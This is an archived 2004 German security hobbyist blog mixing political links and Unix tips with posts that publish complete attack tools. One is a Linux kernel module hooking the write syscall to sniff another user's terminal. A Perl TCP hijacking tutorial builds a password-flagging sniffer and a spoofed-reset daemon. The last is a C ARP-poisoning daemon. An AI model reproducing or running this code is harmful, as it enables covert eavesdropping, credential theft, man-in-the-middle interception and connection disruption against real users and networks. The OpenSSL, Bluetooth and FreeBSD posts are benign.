Datenterrorist
"Freiheit ist das Recht, anderen zu sagen, was sie nicht hören wollen." - George Orwell _

.:: Hübsche Ohrringe, Herr Bush :P ::.


Gefunden bei news.yahoo.com
30.06.04 20:50:10 - balle - No comments - Politik


.:: TTY Sniffer for Linux 2.4 ::.

A simple LKM to sniff a TTY. The TTY to sniff will be configured in /proc/ttysniff and the data can be read from the device /dev/ttysniff (mknod /dev/ttysniff c 40 0).


/*
Just a simple TTY sniffing LKM for Linux 2.4
TTY to sniff can be configured via /proc/ttysniff/*
(default is major 4 minor 2)
TTY data can be read from the device /dev/ttysniff
(use the tool watchtty to do so)
Device must exist (mknod /dev/ttysniff c 40 0)

Programmed by Bastian Ballmann
http://www.datenterrorist.de
30.06.2004

Compile with gcc -I/usr/src/linux/include -c ttysniff.c
Run with insmod ttysniff.o

This program is free software; you can redistribute
it and/or modify it under the terms of the
GNU General Public License version 2 as published
by the Free Software Foundation.

This program is distributed in the hope that it will
be useful, but WITHOUT ANY WARRANTY; without even
the implied warranty of MERCHANTABILITY or FITNESS
FOR A PARTICULAR PURPOSE.
See the GNU General Public License for more details.
*/

#define __KERNEL__
#define MODULE
#define PROCHOOK_H

#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/mm.h>
#include <linux/fs.h>
#include <linux/proc_fs.h>
#include <sys/syscall.h>
#include <asm/uaccess.h>


EXPORT_NO_SYMBOLS;
MODULE_LICENSE("GPL");

/* Syscall stuff */
extern void *sys_call_table[];
int (*old_write)(int, const void *, size_t);
int new_write(int, const void *, size_t);

/* TTY */
#define TTYSIZE 4
char tty_minor[TTYSIZE] = {0};
char tty_major[TTYSIZE] = {0};

/* Ring buffer to store input */
#define BUFSIZE 4096
char buffer[BUFSIZE] = {0};
int buf_in = 0;
int buf_out = 0;

/* Proc stuff */
struct proc_dir_entry *proc_dir;
struct proc_dir_entry *proc_minor;
struct proc_dir_entry *proc_major;
int proc_read_minor(char *, char **, off_t, int, int *, void *);
int proc_write_minor(struct file *, const char *, unsigned long, void *);
int proc_read_major(char *, char **, off_t, int, int *, void *);
int proc_write_major(struct file *, const char *, unsigned long, void *);

/* Device stuff */
static int dev_open(struct inode *, struct file *);
static int dev_close(struct inode *, struct file *);
static int dev_read(struct file *, char *, size_t, loff_t *);

static struct file_operations fops =
{
owner: THIS_MODULE,
read: dev_read,
open: dev_open,
release: dev_close,
};


/************************************************************************
MAIN PART
************************************************************************/

/* Initialization */
int init_module(void)
{
/* Default TTY */
tty_major[0] = '4';
tty_minor[0] = '2';

/* Create proc dir */
proc_dir = proc_mkdir("ttysniff", &proc_root);

/* Create proc files */
if(proc_dir)
{
proc_major = create_proc_entry("major", 0600, proc_dir);
proc_major->owner = THIS_MODULE;
proc_major->write_proc = proc_write_major;
proc_major->read_proc = proc_read_major;

proc_minor = create_proc_entry("minor", 0600, proc_dir);
proc_minor->owner = THIS_MODULE;
proc_minor->write_proc = proc_write_minor;
proc_minor->read_proc = proc_read_minor;
}

/* Register device */
if(register_chrdev(40, "ttysniff", &fops))
return -EIO;

/* Overwrite write syscall */
old_write = sys_call_table[__NR_write];
sys_call_table[__NR_write] = new_write;

return 0;
}

/* Cleanup */
void cleanup_module(void)
{
/* Remove proc dir */
remove_proc_entry(proc_dir->name, &proc_root);

/* Unregister device */
unregister_chrdev(40, "ttysniff");

/* Restore write syscall */
sys_call_table[__NR_write] = old_write;
}


/************************************************************************
Syscalls
************************************************************************/

/*
New write() syscall
Invoke the old write() syscall
Test if data is writen to the device we should monitor
Copy data to our ring buffer if so
*/
int new_write(int fd, const void *buf, size_t count)
{
/* Get the inode of the filehandle */
struct file *file = (struct file *)fget(fd);
struct dentry *dentry = (struct dentry *)file->f_dentry;
struct inode *inode = (struct inode *)dentry->d_inode;

/* Invoke the old write() syscall */
int bytes_read = old_write(fd,buf,count);

/* Is this the TTY we shall sniff input from? */
if( (major(inode->i_rdev) == simple_strtol(tty_major,NULL,0)) &&
(minor(inode->i_rdev) == simple_strtol(tty_minor,NULL,0)) )
{
/* Copy the userland buffer byte by byte into our ring buffer */
while(count)
{
if(buf_in > BUFSIZE-1)
buf_in = 0;

get_user(buffer[buf_in++], (char*)buf++);
count--;
}
}

fput(file);
return bytes_read;
}


/************************************************************************
Proc
************************************************************************/

/* Read major number */
int proc_read_major(char *buf, char **start, off_t offset, int count, int *eof, void *data)
{
return sprintf(buf,"%s\n",tty_major);;
}

/* Write major number */
int proc_write_major(struct file *file, const char *buf, unsigned long count, void *data)
{
memset(tty_major,'',TTYSIZE);
strncpy(tty_major,buf,count);
return strlen(buf);
}

/* Read minor number */
int proc_read_minor(char *buf, char **start, off_t offset, int count, int *eof, void *data)
{
return snprintf(buf,count,"%s\n",tty_minor);;
}

/* Write minor number */
int proc_write_minor(struct file *file, const char *buf, unsigned long count, void *data)
{
memset(tty_minor,'',TTYSIZE);
strncpy(tty_minor,buf,count);
return strlen(buf);
}


/************************************************************************
Device
************************************************************************/

/* Open the device */
static int dev_open(struct inode *i, struct file *f)
{
if(current->euid != 0)
return -1;

MOD_INC_USE_COUNT;
return 0;
}

/* Close the device */
static int dev_close(struct inode *i, struct file *f)
{
MOD_DEC_USE_COUNT;
return 0;
}

/* Read from device */
static int dev_read(struct file *file, char *buf, size_t count, loff_t *pos)
{
int bytes_read = 0;

/* No new input? */
if(buf_out == buf_in)
return 0;

if(buffer[buf_out] == 0)
return 0;

/* Copy the ring buffer to the userland buffer */
while(count && buffer[buf_out])
{
put_user(buffer[buf_out++], buf++);
count--;
bytes_read++;

if(buf_out > BUFSIZE-1)
{
buf_out = 0;
break;
}
}

return bytes_read;
}
// EOF

/*
Simple program to read input from /dev/ttysniff
Programmed by Bastian Ballmann
http://www.datenterrorist.de
30.06.2004

This program is free software; you can redistribute
it and/or modify it under the terms of the
GNU General Public License version 2 as published
by the Free Software Foundation.

This program is distributed in the hope that it will
be useful, but WITHOUT ANY WARRANTY; without even
the implied warranty of MERCHANTABILITY or FITNESS
FOR A PARTICULAR PURPOSE.
See the GNU General Public License for more details.
*/

#include <stdio.h>
#include <errno.h>
#include <fcntl.h>
#include <unistd.h>


int main(void)
{
char c;

/* open device */
int fd = open("/dev/ttysniff",O_RDONLY);

if(fd == -1)
{
perror("open /dev/ttyhijack");
exit(1);
}

/* Unbuffered output */
setvbuf(stdout, NULL, _IONBF, 0);

/* Read input and write it to stdout */
while(1)
{
if(read(fd,&c,1) > 0)
putchar(c);
else
usleep(1);
}

close(fd);
return 0;
}

// [EOF]


30.06.04 14:18:00 - balle - 25 comments - Source Code


.:: Polizeiberichte per RSS ::.

Beim Presseportal gibt es eine Übersicht von RSS-Feeds mit den Polizeimeldungen aller möglichen Dienstellen.
Gefunden in Moe's Blog
26.06.04 15:14:46 - balle - 11 comments - News


.:: bnep0 automatisch konfigurieren ::.

Bisher hab ich das bnep0 Interface immer manuell hochgefahren und konfiguriert, wenn ich ein PAN Netzwerk aufgebaut hab. Doch es geht auch automatisch, denn das Script /etc/bluetooth/pan/dev-up wird aufgerufen, falls es vorhanden ist.
Ergo ein simples Shell Script plazieren und gut ist.
#!/bin/sh
ifconfig bnep0 192.168.1.1 up
Wer will kann in diesem Script noch andere Sachen erledigen wie Regeln zu seiner Firewall adden oder irgendwas in ne Logdatei kritzeln oder was weiss ich :)
25.06.04 12:32:47 - balle - 27 comments - Bluetooth


.:: Dateien verschlüsseln mit OpenSSL ::.

Verschlüsseln (mit AES 256):
openssl enc -e aes256 -in <file_to_encrypt> -out <encrypted_file>

Entschlüsseln
openssl enc -d aes256 -in <ecrypted_file> -out <plain_file>
23.06.04 19:18:35 - balle - 44 comments - Kryptografie


.:: Software für Windowsumsteiger ::.

Eine seeehr ausführliche Liste an freier Software eingeteilt nach Kategorien und ihren Windowspendants. Wirklich zu empfehlen!
click
23.06.04 17:52:44 - balle - 1 comment - Software


.:: Chinesisches Sprichwort ::.

Nur in stillen Wassern spiegeln sich die Sterne.
23.06.04 15:12:05 - balle - No comments - News


.:: Die wichtigsten Punkte der neuen EU-Verfassung... ::.

...gibt's auf Tagesschau.de.
Die interessantesten Punkte finde ich, dass die EU einen Aussenminister bekommen soll. Das hilft vielleicht eine einheitliche Sicherheitspolitik wie im Falle des Irak Kriegs zu verfolgen.
Und das EU Parlament, die Stimmes des europäischen Volkes, soll gestärkt werden.
Jetzt muss die EU-Verfassung "nur" noch in allen 25 Staaten bestätigt werden.
22.06.04 13:28:53 - balle - 2 comments - Politik


.:: WLAN Hotspots finden ::.

22.06.04 00:37:38 - balle - 37 comments - WLAN


.:: Es muss nicht immer gleich ein neuer Kernel sein ::.

Ein FreeBSD GENERIC Kernel bringt oft keine Treiber für die Soundkarte mit. Bisher hab ich gedacht, dass ich jetzt immer nen neuen Kernel basteln muss, was an und für sich nicht tragisch ist, da ich sowieso auf jedem Linux und FreeBSD System immer einen eigenen Kernel bastel, aber dennoch isset nett zu wissen, dass das nicht unbedingt notwendig ist.
Man kann auch ganz einfach und vor allem viel schneller ein Kernel Modul z.B. pcm baun:
cd /usr/src/sys/modules/sound/pcm
make install
Fertig. Falls das Modul nicht automatisch geladen werden sollte, hilft man halt manuell nach:
kldload pcm

21.06.04 19:26:08 - balle - 116 comments - FreeBSD


.:: RSS Reader und Feeds ::.

Was ist RSS?
RSS ist ein XML Datenformat zum Austausch von Nachrichten, das vor allem von Weblogs und Newsseiten verwendet wird.

Warum RSS?
Weils praktisch ist alle Newsseiten und Weblogs, die man so liest, auf einen Blick im RSS Reader zu haben. Wer mag, kann auch mit meinem Perl Script News2RSS Usenet News im RSS Reader lesen.

Wie lese ich RSS?
Mein bevorzugter RSS Reader für Linux / FreeBSD ist Liferea oder plattformunabhängig in Java: RSSOwl.

Woher RSS?
RSS Verzeichnis
Polizeimeldungen via RSS
Securityfocus Vulns
Securityfocus News
Golem
Chaostal
Chaosdorf
Tagesschau.de
Bsdforen.de
OSNews
Bundesregierung.de

Blogroll
DocX
Pylon
Tim Pritlove
Der Schockwellenreiter
wirres.net
worldwideklein
PlasticThinking
Netzzensur
Bluetooth Weblog
Wifi Weblog
Real life
Astroblog
Betablogger
BILDblog
Djo
Enno
Aktion 23
Netzpolitik
Nutsblog
Rabenhorst
Spreeblick
Stupid Security
Thinknerd
Trifinite Blog

Hier meine RSS Feeds als OPML

Und sonst so?
Chaosradio 87: Die Blogosphäre
21.06.04 18:39:09 - balle - 4 comments - Software


.:: Programming TCP Hijacking tools in Perl ::.

---:[ Introduction

Why should someone write TCP hijacking programs with Perl instead of C?
Well the answear is really simple: Its easier! And you can use the string
and pattern matching power of Perl.
So lets see what one requires to write those tools. You have to get some
modules from CPAN [1]: Net::RawIP, NetPacket, Net::PcapUtils
and you have to install the pcap library [2].
To install the CPAN modules you can use:
perl -MCPAN -eshell
cpan> install
The Net::RawIP module is used to generate packets, the NetPacket bundle to decode
packets and the Net::PcapUtils module is an easy to use Perl interface to the powerful
pcap library to sniff traffic.



---:[ Using Net::PcapUtils

First of all I will show you how to program a simple sniffer script.
This script will simply sniff all TCP traffic on the eth0 interface, decode it and
print the source ip / source port + destination ip / destination port to STDOUT.

#!/usr/bin/perl

# Load modules
use Net::PcapUtils;
use NetPacket::Ethernet qw(:strip);
use NetPacket::TCP;
use NetPacket::IP qw(:strip);

# Are you r00t?
if($> != 0)
{
die "You need EUID 0 to use this tool!\n\n";
}

# Start sniffin in promisc mode
Net::PcapUtils::loop(\&sniffit,
Promisc => 1,
FILTER => 'tcp',
DEV => 'eth0');

# Callback
sub sniffit
{
my ($args,$header,$packet) = @_;
$ip = NetPacket::IP->decode(eth_strip($packet));
$tcp = NetPacket::TCP->decode($ip->{data});

print "$ip->{src_ip}:$tcp->{src_port} --> $ip->{dest_ip}:$tcp->{dest_port}\n";
}

OK. What I have done here is loading the required modules and feeding the loop
function of Net::PcapUtils with some parameters.
The first argument is a callback function which is called for every sniffed packet.
Then I set the network interface configured with the DEV argument into the promisc mode.
Last but not least I add a pcap expression filter. See the tcpdump manpage for more
information on the pcap expression language.
Now lets look at the callback function sniffit().
This function gets 3 parameters:
$args - User specified arguments (not used in the above script)
$header - The header of the sniffed packet (no protocol headers)
$packet - The sniffed packet itself
Then I start decoding the packets ip and tcp header using the comfortable NetPacket decode
function and print the result.
As noticed before this is a really simple example and you can do a lot of more stuff with the
Net::PcapUtils module.
For example you can easily write the dump into a file by specifing SAVEFILE => 'foo.bar', specify
a snaplen SNAPLEN => 1024 or the number of packets to sniff NUMPACKETS => 100.
If you want to pass some data to the callback function than you have to use the USERDATA argument.
Note that you can only pass one argument. Otherwise put your parameters into an array and throw a
reference to that array into play.
Well I think you got the idea. Sniffing and especially decoding packets in Perl is much easier then
in C.



---:[ Using NetPacket

Now lets update the sniffer script so that it can also dump the payload and search for a string
in the payload like USER / PASS.

# Callback
sub sniffit
{
my ($args,$header,$packet) = @_;
$ip = NetPacket::IP->decode(eth_strip($packet));
$tcp = NetPacket::TCP->decode($ip->{data});
$payload = $tcp->{data};

if( ($payload =~ /USER/) || ($payload =~ /PASS/) )
{
print "Got ya! =)\n\n";
}

print "$ip->{src_ip}:$tcp->{src_port} --> $ip->{dest_ip}:$tcp->{dest_port}\n";
print "Payload:\n$payload\n\n";
}

Well I dont think I have to comment anything new here, cause its too easy...



---:[ Using Net::RawIP

What about generating your own packets and throw them on the wire?
Well nothing easier than that!
With Net::RawIP you can create the following packets:
TCP / IP
UDP / IP
ICMP / IP
And here you will notice one disadvantage of writing TCP hijacking tools
in Perl: By the moment you cannot create or decode ARP packets!
But this should change in the next few months...
Lets use Net::RawIP to create a TCP packet with the payload
'Testing Net::RawIP'.

#!/usr/bin/perl

use Net::RawIP;

$packet = new Net::RawIP;

$packet->set({
ip => { saddr => '192.168.1.1',
daddr => '192.168.1.2'
},
tcp => { source => 2323,
dest => 23,
ack => 1,
seq => 10000000,
ack_seq => 10000000,
data => 'Testing Net::RawIP'
}
});

$packet->send(0,1);

First I create a new Net::RawIP object and after that I set the various header
options for the used protocols.
Please read the RFCs to the protocol you want to use for leaning more
about the available header options of that protocol.
In the last line one packet is send with a delay of zero seconds. Here you
can also specify a number of -1 to send this packet in an endless loop.



---:[ Programming a RST daemon

OK. Lets put it all together!
We will now update the sniffit callback function to simply send a spoofed RST
packet back to the source ip for every sniffed packet.
I hope I dont have to advice you that this is only for testing purpose and that
this simple method is also very noisy!

sub sniffit
{
my ($args,$header,$packet) = @_;
$ip = NetPacket::IP->decode(eth_strip($packet));
$tcp = NetPacket::TCP->decode($ip->{data});

$packet->set({
ip => { saddr => $ip->{dest_ip},
daddr => $ip->{src_ip}
},
tcp => { source => $tcp->{dest_port},
dest => $tcp->{src_port},
rst => 1,
seq => $ip->{acknum},
data => 'I am a fake! =)'
}
});

$packet->send(0,1);

print "Reset send $ip->{dest_ip}:$tcp->{dest_port} --> $ip->{src_ip}:$tcp->{src_port}\n";
}

What's new here?
Well I send the packet back to its source so I have to wrap the saddr, daddr, source and
dest options and I have to specify a valid sequence number so I simply use the acknowledgement
number the client sends me.
If you dont know how a valid sequence number looks like please read the document 'Simple active
attack againt TCP', the RFCs or some of the great Phrack articles. ;)
Now if you think you are funny enough you could for example program an smtp / pop3 resetting tool
which will only reset the connection if a special user is trying to log in and read or send some
mails.
Or you could only reset SYN packets, because resetting other packets especially RST packets generated
by your own tool is very stupid!
To do that you drop the following lines before start decoding the packet:

unless($tcp->{flags} == 2)
{
return 1;
}


Its up to you now...



---:[ The last but not least

What can you program using this new knowledge?
You could program a packet generator or a firewall testing tool or an IDS testing tool.
You can also program an telnet or ftp hijacking tool, which injects commands into an opened telnet or
ftp connection and kick the "real" user of that connection.
What about DNS spoofing? Send out bogus DNS reply packets.
Think about it or ask your favorite search engine!
Or you can have a look at the P.A.T.H. (Perl Advanced TCP Hijacking) project [3] to get some ideas.
If you are not familar with TCP hijacking techniques you could read this [4] and this [5].
Keep in mind: Perl is fun!!! =)
20.06.04 14:23:00 - balle - 13 comments - RTFM


.:: Mein momentanes Hintergrundbild ::.

20.06.04 13:56:25 - balle - 2 comments - News


.:: Blinkenlight Videos ::.

Videos zum Blinkenlights Projekt (Hochhaus als Computerdisplay):
Blinkenlights Dokumentationsvideo
Arcade Dokumentationsvideo
Arcarde Bilder. Kann man auch sehr gut als Desktophintergrund verwenden. ;)
20.06.04 11:34:00 - balle - 2 comments - CCC


.:: Verschlüsselte Dateisysteme mit FreeBSD ::.

Ich hab mich heute mal dran gesetzt meine Homepartition auf meinem Laptop unter FreeBSD 4.10 zu verschlüsseln.

GEOM aus dem FreeBSD Handbuch scheidet schon mal aus. da es nur unter FreeBSD 5.x läuft. Als nächstes hab ich einen Blick auf CFS geworfen, das gefiel mir vom Konzept allerdings nicht so sehr, weil ich wollte nicht irgendwas mit Portmap und NFS basteln nur um eine Partition zu verschlüsseln. Als nächstes hab ich mir vncrypt angeschaut, das nach dem gleichen Prinzip wie die verschlüsselten Loopback Devices unter Linux funktioniert. Nach ein paar Tests bin ich durchaus zufrieden mit vncrypt, es ist zwar nicht so gut wie loop-aes und ähnliches unter LInux, aber imho die beste Lösung für FreeBSD stable.
17.06.04 18:13:26 - balle - 140 comments - FreeBSD


.:: ARP spoofing ::.

/*

A simple ARP poisoning daemon,


Programmed by Bastian Ballmann

Last update: 06.06.2004

http://www.datenterrorist.de

*/


#include <sys/ioctl.h>

#include <sys/socket.h>

#include <netinet/in.h>

#include <arpa/inet.h>

#include <net/ethernet.h>

#include <net/if.h>


#define ARPOP_REPLY 2

#define ARPHDR_ETHER 1

#define ETH_ALEN 6

#define IP_ALEN 4


// ARP Header Struktur

struct arphdr

{

u_short hw_type; // hardware type

u_short proto_type; // protocol type

char ha_len; // hardware address length

char pa_len; // protocol address length

u_short opcode; // arp opcode

unsigned char source_add[ETH_ALEN]; // source mac

unsigned char source_ip[IP_ALEN]; // source ip

unsigned char dest_add[ETH_ALEN]; // destination mac

unsigned char dest_ip[IP_ALEN]; // destination ip

};



int main(int argc, char *argv[])

{

int r_sock, w_sock;

int packetsize = sizeof(struct ether_header) + sizeof(struct arphdr);

char packet[packetsize];

struct ether_header *eth = (struct ether_header *) packet;

struct arphdr *arp = (struct arphdr *)(packet + sizeof(struct ether_header));

unsigned char arppacket[sizeof(struct arphdr) + sizeof(struct ether_header)];

struct ether_header *spoof_eth = (struct ether_header *)arppacket;

struct arphdr *spoof_arp = (struct arphdr *)(arppacket + sizeof(struct ether_header));

struct sockaddr addr;

int one = 1;

struct ifreq iface;

char smac[ETH_ALEN];


if(argc < 2)

{

printf("%s <device>\n", argv[0]);

exit(1);

}


// Are you root?

if(getuid() != 0)

{

printf("You must be root\n");

exit(1);

}


// Raw Socket to read

if((r_sock = socket(AF_INET, SOCK_PACKET, htons(ETH_P_ARP))) < 0)

{

perror("socket");

exit(1);

}


// Raw Socket to write

if((w_sock = socket(AF_INET, SOCK_PACKET, htons(ETH_P_ARP))) < 0)

{

perror("socket");

exit(1);

}


// Read MAC Address

strcpy(iface.ifr_name, argv[1]);


if((ioctl(r_sock, SIOCGIFHWADDR, &iface)) < 0)

{

perror("ioctl SIOCGIFHWADDR");

exit(1);

}

else

{

sprintf(smac,"%02x:%02x:%02x:%02x:%02x:%02x",

iface.ifr_hwaddr.sa_data[0] & 0xff,

iface.ifr_hwaddr.sa_data[1] & 0xff,

iface.ifr_hwaddr.sa_data[2] & 0xff,

iface.ifr_hwaddr.sa_data[3] & 0xff,

iface.ifr_hwaddr.sa_data[4] & 0xff,

iface.ifr_hwaddr.sa_data[5] & 0xff);

}


// Wait for ARP requests and send ARP replies

while(1)

{

read(r_sock,packet,packetsize);


// Is that packet an ARP request?

if((eth->ether_type == 1544) && (arp->opcode == 256))

{

// Ethernet Header

memcpy(spoof_eth->ether_dhost, eth->ether_shost, ETH_ALEN); // Destination MAC

memcpy(spoof_eth->ether_shost, smac, ETH_ALEN); // Source MAC

spoof_eth->ether_type = htons(ETHERTYPE_ARP); // Packet type


// ARP Header

spoof_arp->hw_type = htons(ARPHDR_ETHER); // Hardware address type

spoof_arp->proto_type = htons(ETH_P_IP); // Protocol address type

spoof_arp->ha_len = ETH_ALEN; // Hardware address length

spoof_arp->pa_len = IP_ALEN; // Protocol address length

spoof_arp->opcode = htons(ARPOP_REPLY); // ARP operation type

memcpy(spoof_arp->source_add, (char*)ether_aton(smac), ETH_ALEN); // Sender MAC

memcpy(spoof_arp->source_ip, arp->dest_ip, IP_ALEN); // Source IP

memcpy(spoof_arp->dest_add, arp->source_add, ETH_ALEN); // Target MAC

memcpy(spoof_arp->dest_ip, arp->source_ip, IP_ALEN); // Target IP


// Run packet! Run!


strncpy(addr.sa_data, argv[1], sizeof(addr.sa_data));

printf("arp reply %s is at %s\n", inet_ntoa(*(struct in_addr*)&spoof_arp->source_ip), smac);


if(sendto(w_sock, arppacket, packetsize, 0, &addr, sizeof(addr)) < 0)

{

perror("send");

exit(1);

}

}

}


close(r_sock);

close(w_sock);

return 0;

}


06.06.04 14:19:00 - balle - 363 comments - Source Code